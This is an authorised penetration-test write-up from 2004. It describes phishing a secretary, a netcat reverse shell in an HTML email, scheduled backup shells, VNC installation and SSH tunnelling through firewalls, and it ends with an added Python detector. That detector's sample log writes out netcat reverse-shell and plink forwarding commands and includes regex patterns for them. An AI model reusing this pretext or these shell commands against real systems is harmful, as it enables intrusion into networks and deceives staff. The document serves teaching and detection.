02.12.04

By Mati Aharoni
I was requested to perform a proof-of-concept hack into a large organization
a few weeks ago. The aim was to get an interactive session, preferably
GUI, on one of the internal machines, which was guarded by two firewalls
(external and DMZ) and an intrusion detection system. I was allowed
to use any means necessary to achieve this goal. This is extremely
unusual for a penetration test, where the rules, guidelines and penetration
methods are very strict and well defined. I was supposed to impersonate
a hacker who would stop at nothing to gain interactive access to
the internal network.
Obviously, there was no external access to this machine from the internet,
so I had to plan the attack carefully. I decided to use some social
engineering skills to initiate a connection from the internal network
to my attacking machine, as this was the only way to establish communications
with my target.
I called up the organization, and asked to speak with the secretary
working on my target computer. I told her that "I was interested in
buying one of their products, and I would like to send her an email
with a few questions, before I make the purchase". She gladly complied,
and disclosed her email address to me.
I crafted a special HTML email with a reverse shell (netcat) payload,
which would execute itself once the email was opened. A few minutes
later, she received the email and opened it, thus shovelling a shell
to my listening machine. Let the games begin.
Once I had the shell, I had to create some "backup shells" in case
the connection got severed. There's nothing worse than losing the
only connection to a penetrated machine… I did this using the
"at" command, sending myself a netcat shell every 15 minutes. I found
myself smiling every 15 minutes.
Once this was done, my first instinct was to start uploading my toolkit
to this machine using TFTP; however, it seemed that there were very
restrictive firewall policies on outgoing connections in the internal
network. TFTP just didn't go through.
By echoing FTP commands into a text file, I downloaded a small toolkit
to the victim machine, which included some VNC files and a custom-made
registry file that sets the VNC settings (such as a VNC password
and a setting that allows connecting to VNC locally – more on that
later).
From this point onwards, I followed the instructions from http://guh.nu
to remotely install VNC, as summarized by these commands:
Now I had VNC installed on the remote machine, but there was no way
to get to port 5900 (VNC) in order to connect to it (two firewalls,
and fascist outbound rules).
I decided to borrow a UNIX technique by which one can tunnel ports
via SSH to remote machines. The SSH client I found suitable for this
job was plink.exe (the PuTTY command-line client).
I installed the SSH server found in Cygwin on my attacking machine,
and proceeded to tunnel port 5900 from the victim machine to my own:
The SSH connection had been made, and from a local netstat -a on my
machine, I could see that port 5900 was successfully mapped to my
attacking computer.
I quickly whipped out my VNC client, and attempted to connect locally
to port 5900:
To my surprise, I was welcomed with a password prompt:
And immediately after, I had a remote VNC session to the attacked
machine.
I had tunneled stuff via SSH many times in Linux environments; however,
this was the first time I attempted to do it under Windows.
I was blown away by the speed of the VNC session (due to the compression
on the SSH channel), and by the fact that it actually worked. I thought
of releasing a stray KaHt2.exe into the internal network (all in GUI,
of course); however, my objectives had been achieved, and it was very
late at night.
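As an added defensive illustration (not code from the original article or its author), the chain described above leaves a recognisable trail in process-creation telemetry: a mail client spawning a shell, repeated "at" jobs, a script-driven ftp transfer, a silent registry import and a plink port forward. The script below runs a few such rules over constructed sample events in a hypothetical pipe-delimited log format and flags a host only when several distinct stages appear together, which avoids alerting on any single command that may have a legitimate use.

```python
import re
from collections import defaultdict

# Constructed sample events in a hypothetical "host|user|parent_image|command_line"
# format; not real telemetry. Mirrors the stages described in the write-up.
SAMPLE_LOG = """\
WKS-SEC01|secretary|outlook.exe|nc.exe -e cmd.exe 203.0.113.10 443
WKS-SEC01|secretary|cmd.exe|at 13:15 nc.exe -e cmd.exe 203.0.113.10 443
WKS-SEC01|secretary|cmd.exe|at 13:30 nc.exe -e cmd.exe 203.0.113.10 443
WKS-SEC01|secretary|cmd.exe|ftp -s:ftp.txt 203.0.113.10
WKS-SEC01|secretary|cmd.exe|regedit /s vnc.reg
WKS-SEC01|secretary|cmd.exe|plink.exe -R 5900:127.0.0.1:5900 user@203.0.113.10
WKS-FIN02|clerk|explorer.exe|winword.exe budget.doc
"""

# Command-line rules: (stage name, case-insensitive regex).
CMDLINE_RULES = [
    ("netcat reverse shell", r"\bnc(?:at)?(?:\.exe)?\b.*\s-e\s+\S*cmd"),
    ("scheduled re-spawn via at", r"^at\s+\d{1,2}:\d{2}\b"),
    ("script-driven ftp transfer", r"\bftp(?:\.exe)?\b.*\s-s:"),
    ("silent registry import", r"\bregedit(?:\.exe)?\b.*\s/s\b"),
    ("plink port forward", r"\bplink(?:\.exe)?\b.*\s-[LR]\s*\d+:"),
]
MAIL_CLIENTS = {"outlook.exe"}  # parent images that should never spawn a shell

def parse(log_text):
    """Yield (host, user, parent, cmdline) tuples, skipping malformed lines."""
    for line in log_text.splitlines():
        parts = line.split("|", 3)
        if len(parts) == 4:
            yield tuple(p.strip() for p in parts)

def match_rules(parent, cmdline):
    """Return the names of every stage a single event triggers."""
    hits = [name for name, pat in CMDLINE_RULES if re.search(pat, cmdline, re.I)]
    if parent.lower() in MAIL_CLIENTS and re.search(r"\b(?:cmd|nc|ncat)(?:\.exe)?\b", cmdline, re.I):
        hits.append("mail client spawned shell")
    return hits

def analyze(log_text, min_stages=3):
    """Collect distinct stages per host; flag hosts that reach min_stages."""
    stages = defaultdict(set)
    for host, _user, parent, cmdline in parse(log_text):
        stages[host].update(match_rules(parent, cmdline))
    return {h: sorted(s) for h, s in stages.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for host, found in analyze(SAMPLE_LOG).items():
        print(f"{host}: {len(found)} stages -> {', '.join(found)}")
```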
About the Author:
Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP
Visit the Security through Hacking Web site at http://www.secureit.co.il
for additional information.